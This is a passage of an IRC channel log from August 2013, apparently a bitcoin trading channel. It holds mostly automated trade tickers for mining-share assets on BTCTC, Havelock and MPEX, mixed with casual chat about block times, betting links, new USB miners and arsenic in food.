[TAT.ASICMINER] 10 @ 0.0269 = 0.269 BTC [+] Aug 25 03:26:02 [BTCTC] [ASICMINER-PT] 1 @ 2.65 BTC [-] Aug 25 03:26:04 [BTCTC] [ASICMINER-PT] 5 @ 2.64 = 13.2 BTC [-] Aug 25 03:26:18 [BTCTC] [ASICMINER-PT] 1 @ 2.601 BTC [-] Aug 25 03:26:20 [BTCTC] [ASICMINER-PT] 3 @ 2.6 = 7.8 BTC [-] Aug 25 03:26:31 [BTCTC] [LABCOIN] 5 @ 0.003345 = 0.0167 BTC [-] Aug 25 03:26:32 [BTCTC] [ASICMINER-PT] 1 @ 2.6 BTC [-] Aug 25 03:26:59 [MPEX] [S.MPOE] 10200 @ 0.00082704 = 8.4358 BTC [+] Aug 25 03:27:50 [BTCTC] [LABCOIN] 1 @ 0.00316 BTC [-] Aug 25 03:28:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0269 BTC [+] Aug 25 03:29:36 [BTCTC] [LABCOIN] 78 @ 0.003345 = 0.2609 BTC [+] Aug 25 03:29:46 [BTCTC] [LABCOIN] 20 @ 0.003345 = 0.0669 BTC [+] Aug 25 03:30:08 [BTCTC] [ASICMINER-PT] 1 @ 2.588 BTC [-] Aug 25 03:31:17 [BTCTC] [ASICMINER-PT] 4 @ 2.587 = 10.348 BTC [-] Aug 25 03:31:48 [BTCTC] [LABCOIN] 646 @ 0.00335 = 2.1641 BTC [+] Aug 25 03:32:19 [BTCTC] [ASICMINER-PT] 1 @ 2.587 BTC [-] Aug 25 03:32:46 [BTCTC] [ASICMINER-PT] 1 @ 2.586 BTC [-] Aug 25 03:32:48 [HAVELOCK] [CFIG] 4 @ 0.1295 = 0.518 BTC [-] Aug 25 03:33:03 [BTCTC] [LABCOIN] 117 @ 0.003375 = 0.3949 BTC [+] Aug 25 03:33:53 [BTCTC] [LABCOIN] 200 @ 0.0034 = 0.68 BTC [+] Aug 25 03:34:08 [BTCTC] [RSM] 1 @ 0.01269 BTC [-] Aug 25 03:34:45 [HAVELOCK] [AM100] 1 @ 0.0244002 BTC [-] Aug 25 03:37:51 [BTCTC] [LABCOIN] 20 @ 0.003351 = 0.067 BTC [-] Aug 25 03:37:52 [BTCTC] [LABCOIN] 54 @ 0.00335 = 0.1809 BTC [-] Aug 25 03:37:54 [BTCTC] [LABCOIN] 502 @ 0.003345 = 1.6792 BTC [-] Aug 25 03:40:11 [BTCTC] [BASIC-MINING] 5 @ 0.218 = 1.09 BTC [-] Aug 25 03:41:13 [BTCTC] [ASICMINER-PT] 1 @ 2.587 BTC [+] Aug 25 03:41:14 [BTCTC] [ASICMINER-PT] 5 @ 2.586 = 12.93 BTC [-] Aug 25 03:47:54 [BTCTC] [DMS.SELLING] 10 @ 0.01745 = 0.1745 BTC [-] **** BEGIN LOGGING AT Sun Aug 25 15:00:01 2013 Aug 25 15:02:49 [BTCTC] [LABCOIN] 37 @ 0.003826 = 0.1416 BTC [+] Aug 25 15:04:21 ;;later tell benkay heh. i left him a comment. the herpderpitude is maximal. Aug 25 15:04:21 The operation succeeded. Aug 25 15:10:18 [BTCTC] [ASICMINER-PT] 2 @ 2.458 = 4.916 BTC [+] Aug 25 15:10:19 [BTCTC] [ASICMINER-PT] 1 @ 2.46 BTC [+] Aug 25 15:13:01 [BTCTC] [ACTIVEMINING] 68 @ 0.005254 = 0.3573 BTC [-] Aug 25 15:13:02 [BTCTC] [ACTIVEMINING] 21 @ 0.005253 = 0.1103 BTC [-] Aug 25 15:13:04 [BTCTC] [ACTIVEMINING] 999 @ 0.005252 = 5.2467 BTC [-] Aug 25 15:13:05 [BTCTC] [ACTIVEMINING] 350 @ 0.00525 = 1.8375 BTC [-] Aug 25 15:13:06 [BTCTC] [ACTIVEMINING] 1665 @ 0.005245 = 8.7329 BTC [-] Aug 25 15:13:07 [BTCTC] [ACTIVEMINING] 260 @ 0.005213 = 1.3554 BTC [-] Aug 25 15:13:09 [BTCTC] [ACTIVEMINING] 335 @ 0.005211 = 1.7457 BTC [-] Aug 25 15:13:10 [BTCTC] [ACTIVEMINING] 302 @ 0.00521 = 1.5734 BTC [-] Aug 25 15:15:39 [BTCTC] [ASICMINER-PT] 1 @ 2.411 BTC [-] Aug 25 15:17:22 kakobrekla http://bitbet.us/bet/472/kncminer-will-deliver-asic-devices-before-october-1st/#c1243 Aug 25 15:17:29 knc is finalized and will be right with us in 14 days. Aug 25 15:23:17 [BTCTC] [LABCOIN] 37 @ 0.003623 = 0.1341 BTC [-] Aug 25 15:23:31 [BTCTC] [LABCOIN] 10 @ 0.003621 = 0.0362 BTC [-] Aug 25 15:24:22 [BTCTC] [LABCOIN] 389 @ 0.00361 = 1.4043 BTC [-] Aug 25 15:27:03 [BTCTC] [ACTIVEMINING] 68 @ 0.005211 = 0.3543 BTC [+] Aug 25 15:27:51 ;;tslb Aug 25 15:27:52 Time since last block: 7 minutes and 59 seconds Aug 25 15:28:01 with all that hashing! Aug 25 15:28:06 [BTCTC] [ACTIVEMINING] 260 @ 0.00521 = 1.3546 BTC [-] Aug 25 15:29:09 [BTCTC] [TAT.ASICMINER] 6 @ 0.02579 = 0.1547 BTC [+] Aug 25 15:29:28 [BTCTC] [TAT.VIRTUALMINE] 1 @ 0.001162 BTC [-] Aug 25 15:30:42 [HAVELOCK] [AM100] 1 @ 0.0257 BTC [+] Aug 25 15:32:02 [BTCTC] [TAT.ASICMINER] 5 @ 0.02579 = 0.129 BTC [+] Aug 25 15:33:25 [BTCTC] [TAT.ASICMINER] 4 @ 0.02579 = 0.1032 BTC [+] Aug 25 15:35:33 [BTCTC] [LABCOIN] 85 @ 0.00376 = 0.3196 BTC [+] Aug 25 15:36:20 [BTCTC] [LABCOIN] 415 @ 0.00376 = 1.5604 BTC [+] Aug 25 15:36:36 ;;tslb Aug 25 15:36:38 Time since last block: 16 minutes and 45 seconds Aug 25 15:36:44 ftw. Aug 25 15:40:34 [BTCTC] [TAT.ASICMINER] 3 @ 0.02579 = 0.0774 BTC [+] Aug 25 15:41:03 [BTCTC] [DMS.SELLING] 10 @ 0.01732 = 0.1732 BTC [-] Aug 25 15:41:47 [BTCTC] [DMS.SELLING] 2 @ 0.01732 = 0.0346 BTC [-] Aug 25 15:45:46 [BTCTC] [TAT.ASICMINER] 2 @ 0.025 = 0.05 BTC [-] Aug 25 15:45:47 [BTCTC] [TAT.ASICMINER] 8 @ 0.0249 = 0.1992 BTC [-] Aug 25 15:46:53 [BTCTC] [ASICMINER-PT] 2 @ 2.463 = 4.926 BTC [+] Aug 25 15:46:54 [BTCTC] [ASICMINER-PT] 2 @ 2.465 = 4.93 BTC [+] Aug 25 15:49:54 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [-] Aug 25 15:53:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.02579 = 0.0516 BTC [+] Aug 25 15:54:08 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] Aug 25 15:54:13 ThickAsThieves http://bitbet.us/bet/520/bitfury-eu-august-orders-will-ship-before-1st/ there, larger pot, short term. Aug 25 15:54:33 [BTCTC] [ACTIVEMINING] 8 @ 0.005352 = 0.0428 BTC [+] Aug 25 15:54:53 [BTCTC] [ACTIVEMINING] 35 @ 0.005352 = 0.1873 BTC [+] Aug 25 15:55:08 [HAVELOCK] [AM100] 5 @ 0.02566666 = 0.1283 BTC [-] Aug 25 15:55:13 [BTCTC] [ACTIVEMINING] 2 @ 0.005352 = 0.0107 BTC [+] Aug 25 15:55:30 [HAVELOCK] [AM100] 1 @ 0.0259 BTC [+] Aug 25 15:58:07 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [-] Aug 25 16:00:25 [BTCTC] [MININGCO.ETF] 7 @ 0.08501 = 0.5951 BTC [-] Aug 25 16:00:42 [BTCTC] [ACTIVEMINING] 2 @ 0.005345 = 0.0107 BTC [-] Aug 25 16:00:56 [BTCTC] [MININGCO.ETF] 3 @ 0.085 = 0.255 BTC [-] Aug 25 16:02:07 [BTCTC] [DMS.MINING] 50 @ 0.00325 = 0.1625 BTC [-] Aug 25 16:08:20 Cool...Pot. Aug 25 16:08:26 [BTCTC] [LABCOIN] 1 @ 0.003719 BTC [-] Aug 25 16:08:52 [BTCTC] [NASTY-PT] 2 @ 0.002299 = 0.0046 BTC [-] Aug 25 16:09:20 Lemme hit that one time...you know..for the cataracts. Aug 25 16:11:57 [BTCTC] [LABCOIN] 85 @ 0.003604 = 0.3063 BTC [-] Aug 25 16:11:59 [BTCTC] [LABCOIN] 10 @ 0.003602 = 0.036 BTC [-] Aug 25 16:12:00 [BTCTC] [LABCOIN] 2300 @ 0.0036 = 8.28 BTC [-] Aug 25 16:12:01 [BTCTC] [LABCOIN] 100 @ 0.00358 = 0.358 BTC [-] Aug 25 16:12:03 [BTCTC] [LABCOIN] 5 @ 0.00355 = 0.0178 BTC [-] Aug 25 16:12:04 [BTCTC] [LABCOIN] 10 @ 0.003501 = 0.035 BTC [-] Aug 25 16:12:04 [BTCTC] [LABCOIN] 100 @ 0.003425 = 0.3425 BTC [-] Aug 25 16:12:05 [BTCTC] [LABCOIN] 2000 @ 0.003424 = 6.848 BTC [-] Aug 25 16:12:06 [BTCTC] [LABCOIN] 2420 @ 0.003423 = 8.2837 BTC [-] Aug 25 16:12:07 [BTCTC] [LABCOIN] 100 @ 0.003401 = 0.3401 BTC [-] Aug 25 16:12:08 [BTCTC] [LABCOIN] 140 @ 0.003355 = 0.4697 BTC [-] Aug 25 16:12:45 lol mircea_popescu Aug 25 16:13:07 lol Aug 25 16:15:14 [MPEX] [S.MPOE] 1597 @ 0.00085074 = 1.3586 BTC [+] Aug 25 16:19:22 [BTCTC] [ASICMINER-PT] 1 @ 2.444 BTC [-] Aug 25 16:19:31 [BTCTC] [BFMINES] 1 @ 0.003482 BTC [+] Aug 25 16:20:11 [BTCTC] [BFMINES] 225 @ 0.003483 = 0.7837 BTC [+] Aug 25 16:20:53 [HAVELOCK] [AM100] 1 @ 0.0254 BTC [-] Aug 25 16:21:29 [BTCTC] [BFMINES] 100 @ 0.003498 = 0.3498 BTC [+] Aug 25 16:22:16 [BTCTC] [BFMINES] 49 @ 0.0035 = 0.1715 BTC [+] Aug 25 16:24:15 [BTCTC] [BTC-TRADING-PT] 2 @ 1.17 = 2.34 BTC [+] Aug 25 16:24:30 [BTCTC] [DMS.SELLING] 5 @ 0.01733 = 0.0867 BTC [+] Aug 25 16:28:44 [HAVELOCK] [SMG] 2 @ 0.00022 = 0.0004 BTC [-] Aug 25 16:33:30 [BTCTC] [LABCOIN] 502 @ 0.003684 = 1.8494 BTC [+] Aug 25 16:33:44 [HAVELOCK] [XBOND] 1 @ 0.001169 BTC [+] Aug 25 16:40:57 [BTCTC] [LABCOIN] 85 @ 0.003669 = 0.3119 BTC [-] Aug 25 16:40:58 [BTCTC] [LABCOIN] 100 @ 0.00367 = 0.367 BTC [+] Aug 25 16:41:00 [BTCTC] [LABCOIN] 100 @ 0.00367 = 0.367 BTC [+] Aug 25 16:41:01 [BTCTC] [LABCOIN] 100 @ 0.00367 = 0.367 BTC [+] Aug 25 16:41:02 [BTCTC] [LABCOIN] 100 @ 0.00367 = 0.367 BTC [+] Aug 25 16:41:03 [BTCTC] [LABCOIN] 100 @ 0.00367 = 0.367 BTC [+] Aug 25 16:41:15 [BTCTC] [ACTIVEMINING] 5 @ 0.005231 = 0.0262 BTC [-] Aug 25 16:41:28 [BTCTC] [LABCOIN] 84 @ 0.003679 = 0.309 BTC [+] Aug 25 16:41:30 [BTCTC] [LABCOIN] 3202 @ 0.00368 = 11.7834 BTC [+] Aug 25 16:41:30 [BTCTC] [LABCOIN] 85 @ 0.00368 = 0.3128 BTC [+] Aug 25 16:44:35 [BTCTC] [DMS.SELLING] 17 @ 0.01733 = 0.2946 BTC [+] Aug 25 16:47:58 [BTCTC] [BTC-GROWTH] 30 @ 0.1 = 3 BTC [-] Aug 25 16:48:00 [BTCTC] [BTC-GROWTH] 10 @ 0.1 = 1 BTC [-] Aug 25 16:48:07 [BTCTC] [DMS.SELLING] 43 @ 0.01733 = 0.7452 BTC [+] Aug 25 16:49:40 [BTCTC] [LABCOIN] 2600 @ 0.00369 = 9.594 BTC [+] Aug 25 16:50:30 [BTCTC] [LABCOIN] 93 @ 0.0037 = 0.3441 BTC [+] Aug 25 16:50:32 [BTCTC] [LABCOIN] 1000 @ 0.00374 = 3.74 BTC [+] Aug 25 16:50:33 [BTCTC] [LABCOIN] 500 @ 0.00374 = 1.87 BTC [+] Aug 25 16:50:34 [BTCTC] [LABCOIN] 400 @ 0.003752 = 1.5008 BTC [+] Aug 25 16:50:35 [BTCTC] [LABCOIN] 100 @ 0.00378 = 0.378 BTC [+] Aug 25 16:50:36 [BTCTC] [LABCOIN] 3052 @ 0.003795 = 11.5823 BTC [+] Aug 25 16:50:36 [BTCTC] [LABCOIN] 855 @ 0.00383 = 3.2747 BTC [+] Aug 25 16:52:57 [BTCTC] [TAT.MINIGAME] 7 @ 0.0002689 = 0.0019 BTC [+] Aug 25 16:54:14 [BTCTC] [LABCOIN] 349 @ 0.003829 = 1.3363 BTC [-] Aug 25 16:54:15 [BTCTC] [LABCOIN] 551 @ 0.00383 = 2.1103 BTC [+] Aug 25 16:56:26 [BTCTC] [ACTIVEMINING] 17 @ 0.005411 = 0.092 BTC [+] Aug 25 17:01:46 http://www.huffingtonpost.com/chris-hunt/arsenic-in-chicken_b_3267334.html Aug 25 17:01:48 Chris Hunt: The Arsenic in Your Chicken Aug 25 17:04:22 [BTCTC] [DMS.SELLING] 10 @ 0.01733 = 0.1733 BTC [+] Aug 25 17:05:56 [HAVELOCK] [AM100] 1 @ 0.0254 BTC [-] Aug 25 17:06:11 [BTCTC] [LABCOIN] 1 @ 0.003563 BTC [-] Aug 25 17:07:27 [HAVELOCK] [XBOND] 5 @ 0.001169 = 0.0058 BTC [+] Aug 25 17:11:03 [BTCTC] [LABCOIN] 85 @ 0.003557 = 0.3023 BTC [-] Aug 25 17:11:05 [BTCTC] [LABCOIN] 265 @ 0.003556 = 0.9423 BTC [-] Aug 25 17:11:58 meat eater problems Aug 25 17:13:57 this is like saying vd is "nononanist problems" Aug 25 17:17:28 [BTCTC] [LABCOIN] 11 @ 0.00382 = 0.042 BTC [+] Aug 25 17:17:53 I'm far from a preachy vegan, but I do like to add the perspective to meat stories/diseases when appropriate Aug 25 17:17:55 [BTCTC] [BFMINES] 625 @ 0.0035 = 2.1875 BTC [+] Aug 25 17:18:16 [BTCTC] [BFMINES] 118 @ 0.002405 = 0.2838 BTC [-] Aug 25 17:18:18 [BTCTC] [BTC-GROWTH] 13 @ 0.1 = 1.3 BTC [-] Aug 25 17:18:59 while eating meat and using arsenic are not dependent, it's one less thing to worry about Aug 25 17:19:26 leaves more time to worry about asicminer Aug 25 17:19:41 well yeah you have a point there, but still Aug 25 17:19:43 [BTCTC] [ASICMINER-PT] 1 @ 2.443 BTC [-] Aug 25 17:19:55 there;'s recentluy been a big bruhaha over arsenic in rice Aug 25 17:19:56 [BTCTC] [TAT.ASICMINER] 20 @ 0.02501 = 0.5002 BTC [-] Aug 25 17:19:57 so it's kinda... lol. Aug 25 17:19:58 [BTCTC] [TAT.ASICMINER] 3 @ 0.025 = 0.075 BTC [-] Aug 25 17:19:59 [BTCTC] [TAT.ASICMINER] 5 @ 0.0249 = 0.1245 BTC [-] Aug 25 17:20:00 [BTCTC] [TAT.ASICMINER] 6 @ 0.0247 = 0.1482 BTC [-] Aug 25 17:20:01 [BTCTC] [TAT.ASICMINER] 5 @ 0.0247 = 0.1235 BTC [-] Aug 25 17:20:02 [BTCTC] [TAT.ASICMINER] 10 @ 0.0246 = 0.246 BTC [-] Aug 25 17:20:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.024 = 1.2 BTC [-] Aug 25 17:20:30 [BTCTC] [KENILWORTH] 4 @ 0.0018 = 0.0072 BTC [+] Aug 25 17:21:41 [BTCTC] [LABCOIN] 30 @ 0.003608 = 0.1082 BTC [-] Aug 25 17:22:23 [BTCTC] [ASICMINER-PT] 1 @ 2.443 BTC [-] Aug 25 17:22:51 leaves more time to worry about asicminer <<< aren't you doing enough worrying for all of us yet? Aug 25 17:23:21 not yet, but i probably should change my pants and start worrying more Aug 25 17:24:21 [BTCTC] [ASICMINER-PT] 3 @ 2.445 = 7.335 BTC [+] Aug 25 17:27:06 [BTCTC] [LABCOIN] 85 @ 0.003797 = 0.3227 BTC [+] Aug 25 17:27:07 [BTCTC] [LABCOIN] 170 @ 0.003798 = 0.6457 BTC [+] Aug 25 17:27:36 [BTCTC] [LABCOIN] 85 @ 0.003798 = 0.3228 BTC [+] Aug 25 17:28:28 Labcoin almost back to its ATH Aug 25 17:28:35 hehe Aug 25 17:29:01 that labcoin thing dont make sense Aug 25 17:29:09 but this is crypto world after all Aug 25 17:31:25 [BTCTC] [LABCOIN] 30 @ 0.003797 = 0.1139 BTC [-] Aug 25 17:31:27 [BTCTC] [LABCOIN] 93 @ 0.003799 = 0.3533 BTC [+] Aug 25 17:32:20 [BTCTC] [DMS.MINING] 46 @ 0.003515 = 0.1617 BTC [+] Aug 25 17:32:21 [BTCTC] [DMS.MINING] 200 @ 0.00352 = 0.704 BTC [+] Aug 25 17:32:23 [BTCTC] [DMS.MINING] 1 @ 0.00352 BTC [+] Aug 25 17:32:24 [BTCTC] [DMS.MINING] 170 @ 0.003529 = 0.5999 BTC [+] Aug 25 17:32:25 [BTCTC] [DMS.MINING] 1000 @ 0.00353 = 3.53 BTC [+] Aug 25 17:33:03 [BTCTC] [TAT.ASICMINER] 1 @ 0.024 BTC [-] Aug 25 17:33:20 [HAVELOCK] [AM100] 1 @ 0.0254 BTC [-] Aug 25 17:33:23 [BTCTC] [DMS.MINING] 4 @ 0.003547 = 0.0142 BTC [+] Aug 25 17:33:24 [BTCTC] [DMS.MINING] 500 @ 0.00355 = 1.775 BTC [+] Aug 25 17:33:25 [BTCTC] [DMS.MINING] 93 @ 0.00356 = 0.3311 BTC [+] Aug 25 17:33:26 [BTCTC] [DMS.MINING] 20 @ 0.00358 = 0.0716 BTC [+] Aug 25 17:33:27 [BTCTC] [DMS.MINING] 50 @ 0.003599 = 0.18 BTC [+] Aug 25 17:33:28 [BTCTC] [DMS.MINING] 30 @ 0.003625 = 0.1088 BTC [+] Aug 25 17:33:29 [BTCTC] [DMS.MINING] 30 @ 0.00364 = 0.1092 BTC [+] Aug 25 17:33:30 [BTCTC] [DMS.MINING] 27 @ 0.00364 = 0.0983 BTC [+] Aug 25 17:33:31 [BTCTC] [DMS.MINING] 30 @ 0.003699 = 0.111 BTC [+] Aug 25 17:33:31 [BTCTC] [DMS.MINING] 30 @ 0.00375 = 0.1125 BTC [+] Aug 25 17:33:33 [BTCTC] [DMS.MINING] 38 @ 0.003776 = 0.1435 BTC [+] Aug 25 17:33:34 [BTCTC] [DMS.MINING] 68 @ 0.003778 = 0.2569 BTC [+] Aug 25 17:33:50 [BTCTC] [DMS.SELLING] 87 @ 0.0171 = 1.4877 BTC [-] Aug 25 17:33:52 [BTCTC] [DMS.MINING] 87 @ 0.00325 = 0.2828 BTC [-] Aug 25 17:33:54 [BTCTC] [DMS.PURCHASE] 87 @ 0.02 = 1.74 BTC [-] Aug 25 17:35:33 [BTCTC] [ASICMINER-PT] 2 @ 2.444 = 4.888 BTC [-] Aug 25 17:35:34 [BTCTC] [DMS.MINING] 143 @ 0.00378 = 0.5405 BTC [+] Aug 25 17:35:35 [BTCTC] [ASICMINER-PT] 2 @ 2.445 = 4.89 BTC [+] Aug 25 17:35:37 [BTCTC] [ASICMINER-PT] 2 @ 2.45 = 4.9 BTC [+] Aug 25 17:35:38 [BTCTC] [ASICMINER-PT] 1 @ 2.465 BTC [+] Aug 25 17:36:47 [HAVELOCK] [XBOND] 1 @ 0.001169 BTC [+] Aug 25 17:37:13 [HAVELOCK] [XBOND] 1 @ 0.001169 BTC [+] Aug 25 17:38:03 [HAVELOCK] [XBOND] 9 @ 0.001169 = 0.0105 BTC [+] Aug 25 17:39:42 [BTCTC] [ASICMINER-PT] 1 @ 2.464 BTC [-] Aug 25 17:39:43 [BTCTC] [ASICMINER-PT] 2 @ 2.465 = 4.93 BTC [+] Aug 25 17:40:14 [BTCTC] [DMS.MINING] 300 @ 0.00378 = 1.134 BTC [+] Aug 25 17:41:03 [BTCTC] [LABCOIN] 1 @ 0.003702 BTC [-] Aug 25 17:42:07 [BTCTC] [LABCOIN] 1 @ 0.003768 BTC [+] Aug 25 17:42:55 [BTCTC] [HOSTED-MINING] 1 @ 0.2799 BTC [-] Aug 25 17:43:05 [BTCTC] [ASICMINER-PT] 1 @ 2.474 BTC [+] Aug 25 17:43:08 [BTCTC] [LABCOIN] 84 @ 0.003768 = 0.3165 BTC [+] Aug 25 17:45:52 [BTCTC] [ASICMINER-PT] 1 @ 2.469 BTC [-] Aug 25 17:47:19 [BTCTC] [LABCOIN] 5700 @ 0.00375 = 21.375 BTC [-] Aug 25 17:47:20 [BTCTC] [LABCOIN] 1600 @ 0.00375 = 6 BTC [-] Aug 25 17:47:22 [BTCTC] [LABCOIN] 1 @ 0.003735 BTC [-] Aug 25 17:47:24 [BTCTC] [LABCOIN] 20 @ 0.003601 = 0.072 BTC [-] Aug 25 17:47:25 [BTCTC] [LABCOIN] 3639 @ 0.003565 = 12.973 BTC [-] Aug 25 17:47:26 [BTCTC] [LABCOIN] 99 @ 0.003564 = 0.3528 BTC [-] Aug 25 17:47:27 [BTCTC] [LABCOIN] 141 @ 0.003562 = 0.5022 BTC [-] Aug 25 17:48:14 [BTCTC] [ASICMINER-PT] 2 @ 2.47 = 4.94 BTC [+] Aug 25 17:48:18 [BTCTC] [TAT.ASICMINER] 6 @ 0.02559 = 0.1535 BTC [+] Aug 25 17:48:33 [MPEX] [S.MPOE] 4750 @ 0.00084855 = 4.0306 BTC [-] Aug 25 17:48:41 [MPEX] [S.MPOE] 10850 @ 0.00084913 = 9.2131 BTC [+] Aug 25 17:51:16 [BTCTC] [DMS.SELLING] 13 @ 0.01733 = 0.2253 BTC [+] Aug 25 17:51:53 [BTCTC] [DMS.SELLING] 25 @ 0.01733 = 0.4333 BTC [+] Aug 25 17:56:53 [BTCTC] [ASICMINER-PT] 2 @ 2.474 = 4.948 BTC [+] Aug 25 17:57:07 [BTCTC] [DMS.SELLING] 52 @ 0.01733 = 0.9012 BTC [+] Aug 25 17:58:41 [HAVELOCK] [XBOND] 1 @ 0.00117 BTC [+] Aug 25 17:58:55 [BTCTC] [ASICMINER-PT] 5 @ 2.475 = 12.375 BTC [+] Aug 25 18:00:43 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [+] Aug 25 18:02:44 [BTCTC] [ASICMINER-PT] 3 @ 2.475 = 7.425 BTC [+] Aug 25 18:02:45 [BTCTC] [ASICMINER-PT] 1 @ 2.475 BTC [+] Aug 25 18:03:20 [BTCTC] [ASICMINER-PT] 4 @ 2.475 = 9.9 BTC [+] Aug 25 18:03:41 [BTCTC] [LABCOIN] 85 @ 0.003602 = 0.3062 BTC [+] Aug 25 18:03:42 [BTCTC] [LABCOIN] 20 @ 0.003601 = 0.072 BTC [-] Aug 25 18:03:43 [BTCTC] [LABCOIN] 945 @ 0.00358 = 3.3831 BTC [-] Aug 25 18:04:07 [BTCTC] [BASIC-MINING] 3 @ 0.2274 = 0.6822 BTC [+] Aug 25 18:04:08 [BTCTC] [BASIC-MINING] 9 @ 0.2275 = 2.0475 BTC [+] Aug 25 18:12:52 [BTCTC] [ASICMINER-PT] 3 @ 2.48 = 7.44 BTC [+] Aug 25 18:12:55 [BTCTC] [LABCOIN] 85 @ 0.003602 = 0.3062 BTC [+] Aug 25 18:13:14 [BTCTC] [LABCOIN] 50 @ 0.003601 = 0.1801 BTC [-] Aug 25 18:13:19 New, slimmer, more colorful USB miners from AM https://bitcointalk.org/index.php?topic=280961 Aug 25 18:14:18 [BTCTC] [LABCOIN] 359 @ 0.003562 = 1.2788 BTC [-] Aug 25 18:14:20 [BTCTC] [LABCOIN] 215 @ 0.003561 = 0.7656 BTC [-] Aug 25 18:16:46 [BTCTC] [DMS.SELLING] 240 @ 0.01734 = 4.1616 BTC [+] Aug 25 18:16:47 [BTCTC] [DMS.SELLING] 160 @ 0.01738 = 2.7808 BTC [+] Aug 25 18:18:31 hey ThickAsThieves :) Aug 25 18:19:04 hey hey Aug 25 18:19:14 [BTCTC] [LABCOIN] 85 @ 0.003743 = 0.3182 BTC [+] Aug 25 18:19:15 [BTCTC] [ASICMINER-PT] 1 @ 2.499 BTC [+] Aug 25 18:19:38 [BTCTC] [LABCOIN] 85 @ 0.003743 = 0.3182 BTC [+] Aug 25 18:19:49 [BTCTC] [LABCOIN] 125 @ 0.003743 = 0.4679 BTC [+] Aug 25 18:20:25 new usbs look good Aug 25 18:20:28 [BTCTC] [LABCOIN] 2175 @ 0.003561 = 7.7452 BTC [-] Aug 25 18:20:40 [BTCTC] [LABCOIN] 2 @ 0.003561 = 0.0071 BTC [-] Aug 25 18:20:43 [BTCTC] [LABCOIN] 85 @ 0.003561 = 0.3027 BTC [-] Aug 25 18:20:45 they do Aug 25 18:21:19 [BTCTC] [LABCOIN] 40 @ 0.003561 = 0.1424 BTC [-] Aug 25 18:23:44 [BTCTC] [LABCOIN] 85 @ 0.003736 = 0.3176 BTC [+] Aug 25 18:24:00 [BTCTC] [ASICMINER-PT] 1 @ 2.5 BTC [+] Aug 25 18:24:13 [BTCTC] [ASICMINER-PT] 2 @ 2.51 = 5.02 BTC [+] Aug 25 18:24:35 [BTCTC] [DMS.MINING] 1 @ 0.00336 BTC [-] Aug 25 18:25:00 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [+] Aug 25 18:25:02 [BTCTC] [LABCOIN] 6 @ 0.003739 = 0.0224 BTC [+] Aug 25 18:25:02 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Aug 25 18:25:45 [BTCTC] [ACTIVEMINING] 2 @ 0.005426 = 0.0109 BTC [+] Aug 25 18:25:55 [BTCTC] [DMS.MINING] 50 @ 0.00336 = 0.168 BTC [-] Aug 25 18:25:56 [BTCTC] [LABCOIN] 100 @ 0.003737 = 0.3737 BTC [-] Aug 25 18:26:23 [BTCTC] [LABCOIN] 10 @ 0.0037 = 0.037 BTC [-] Aug 25 18:26:26 [BTCTC] [ASICMINER-PT] 2 @ 2.53 = 5.06 BTC [+] Aug 25 18:26:36 [BTCTC] [ASICMINER-PT] 1 @ 2.53 BTC [+] Aug 25 18:26:38 [BTCTC] [ASICMINER-PT] 2 @ 2.54 = 5.08 BTC [+] Aug 25 18:27:27 [BTCTC] [LABCOIN] 50 @ 0.003601 = 0.1801 BTC [-] Aug 25 18:27:29 [BTCTC] [LABCOIN] 100 @ 0.00358 = 0.358 BTC [-] Aug 25 18:27:29 [BTCTC] [LABCOIN] 100 @ 0.00356 = 0.356 BTC [-] Aug 25 18:27:30 [BTCTC] [LABCOIN] 95 @ 0.003557 = 0.3379 BTC [-] Aug 25 18:27:32 [BTCTC] [LABCOIN] 882 @ 0.003557 = 3.1373 BTC [-] Aug 25 18:27:33 [BTCTC] [LABCOIN] 500 @ 0.003556 = 1.778 BTC [-] Aug 25 18:27:34 [BTCTC] [LABCOIN] 300 @ 0.003555 = 1.0665 BTC [-] Aug 25 18:27:35 [BTCTC] [LABCOIN] 100 @ 0.00355 = 0.355 BTC [-] Aug 25 18:27:44 [BTCTC] [ASICMINER-PT] 1 @ 2.549 BTC [+] Aug 25 18:27:45 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Aug 25 18:28:34 [BTCTC] [ASICMINER-PT] 3 @ 2.55 = 7.65 BTC [+] Aug 25 18:29:03 [BTCTC] [ASICMINER-PT] 4 @ 2.55 = 10.2 BTC [+] Aug 25 18:30:17 [BTCTC] [LABCOIN] 10 @ 0.003547 = 0.0355 BTC [-] Aug 25 18:30:40 [BTCTC] [ASICMINER-PT] 3 @ 2.55 = 7.65 BTC [+] Aug 25 18:31:18 [BTCTC] [RSM] 1 @ 0.01337 BTC [+] Aug 25 18:31:36 [BTCTC] [LABCOIN] 1 @ 0.003547 BTC [-] Aug 25 18:31:39 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [+] Aug 25 18:31:40 [BTCTC] [TAT.ASICMINER] 1 @ 0.02413 BTC [-] Aug 25 18:31:44 [BTCTC] [TAT.ASICMINER] 59 @ 0.02566 = 1.5139 BTC [+] Aug 25 18:31:56 [BTCTC] [LABCOIN] 85 @ 0.003402 = 0.2892 BTC [-] Aug 25 18:31:58 [BTCTC] [LABCOIN] 60 @ 0.003401 = 0.2041 BTC [-] Aug 25 18:31:59 [BTCTC] [LABCOIN] 4940 @ 0.0034 = 16.796 BTC [-] Aug 25 18:32:11 [BTCTC] [RSM] 15 @ 0.01338 = 0.2007 BTC [+] Aug 25 18:32:40 [BTCTC] [ASICMINER-PT] 7 @ 2.55 = 17.85 BTC [+] Aug 25 18:32:44 lol: https://bitcointalk.org/index.php?topic=263445.msg3005310#msg3005310 Aug 25 18:32:44 [BTCTC] [LABCOIN] 10 @ 0.003509 = 0.0351 BTC [+] Aug 25 18:32:57 [BTCTC] [S.BBET-PT] 1 @ 0.001856 BTC [-] Aug 25 18:33:11 [BTCTC] [S.BBET-PT] 1 @ 0.001856 BTC [-] Aug 25 18:33:20 [BTCTC] [ASICMINER-PT] 1 @ 2.55 BTC [+] Aug 25 18:33:21 [BTCTC] [ASICMINER-PT] 2 @ 2.55 = 5.1 BTC [+] Aug 25 18:33:22 should be interersting soon, i doubt am lowered it's hashing power without a good reason Aug 25 18:33:22 [BTCTC] 